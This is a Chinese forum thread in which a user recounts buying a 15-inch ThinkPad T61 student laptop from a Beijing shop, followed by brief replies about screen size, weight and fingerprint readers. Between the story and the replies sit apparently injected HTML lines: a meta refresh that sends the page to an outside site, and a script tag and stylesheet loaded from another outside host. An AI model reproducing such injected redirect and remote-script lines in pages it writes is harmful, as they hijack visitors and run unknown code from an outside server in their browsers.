开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 我的学生机8月15购机经历(贵宾申请)

仰慕小黑已经很久了,可看到T系列的价格,让我打消了购买的念头。到了有天朋友的T60 出现在我面前,说是价格12000多,让我重新憧憬起了拥有小黑的日子。跟朋友说起哪里能买到的问题,他向我推荐了xy,说是很专业,也很诚信。于是,就在翔意网站上潜水,一潜就是几个月,慢慢了解了购买的流程,各种配置的含义。

因为从事的工作是工程图,所以要求屏幕越大越好,所以,只能选择15寸宽屏的机器。这样选择范围可就小了很多。毕竟现在14寸是主流。每天上网都要看看翔意的报价单,看看15寸的机型。开始,看中了T60A44,可是觉得配置有点低,于是就等啊。终于有一天等到了港行的学生机,有两款是15寸的。取消了摄像头,指纹识别,增加了内存,呵呵。可赶上这波了,哈哈

于是,这一日,去好人民币准备购机了。上网一看,说是没有货,打电话也说要等到晚上才能确定能不能来货。我就等啊,晚上5点钟打电话说来货了,我高兴坏了,就打电话跟翔意约定第二天中午拿货。第二天中午又有事脱不开身,改在下午才打车到了天辰大厦。

一进门就有一位身材娇小的美眉接待了我。得知我是来买学生机的,就到里屋搬了一个箱子出来。跟我解释,机器都是开箱的,肯定没问题。跟着就是验机,美眉用各种方式检测机器给我看,还说学生机不保点,不过还没有见过有坏点的。经过一番测试,美眉帮我装系统,把原来的vista干掉,换成xp,时间不长就完事了。优惠套餐选了贴膜,然后50元买了一个清洁套装。剩下的就是交钱走人了,呵呵。在这期间,陆陆续续有来购机的,有来买包的,有来维修的,看来很忙碌。

回到家,兴奋的打开心爱的T61,耐心的装各种我需要的软件。心里这个美啊。第二天,把机器拿到办公室,同事们都称赞小黑好,心里就更美了。

在拥有小黑的日子,我会一直美下去...........

+400---tszmsid
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

tszmsid + 400

呵呵   终于见到学生机玩家的身影了   是用小黑的女生吗????
宽屏感觉还不是习惯.
换个双肩包吧,单肩太累了
不错啊~~~恭喜喽!!
挺漂亮的,恭喜楼主拉
恭喜楼主,还是感觉普屏好,不太喜欢宽屏
恭喜恭喜,可以得到心意的机子
迅速恭喜楼主!好好保护吧,15寸的够大,也够沉!
总觉得很沉。沉甸甸的。
有几张照得太虚了,看得好累 恭喜楼主抱的小黑归
呵呵,恭喜啊,本子好猛!
好象是第1个学生机的图吧~~不错,很清晰~恭喜LZ
该买个MACp17寸的
那两个MM也是买小黑的吗?MM买小黑的还真是少见啊。
不错,恭喜 。。。。。
说实话,如果不开车挤公交确实很麻烦啊

但是 15寸宽屏确实大,看图很爽

但是,感觉放在腿上很热啊,大家有这感觉吗
要是有指纹识别就更好了
15的宽屏很好看
支持
贵宾啥时候通过啊
·····
vista 用宽屏好些
15的 重量啊 不过屏大看者爽
原帖由 wjl1981 于 2007-8-17 22:13 发表
要是有指纹识别就更好了

这东西根本就没什么用啊,还是没有好,看起来干净多了。
上面两个MM,哪一个是你呀?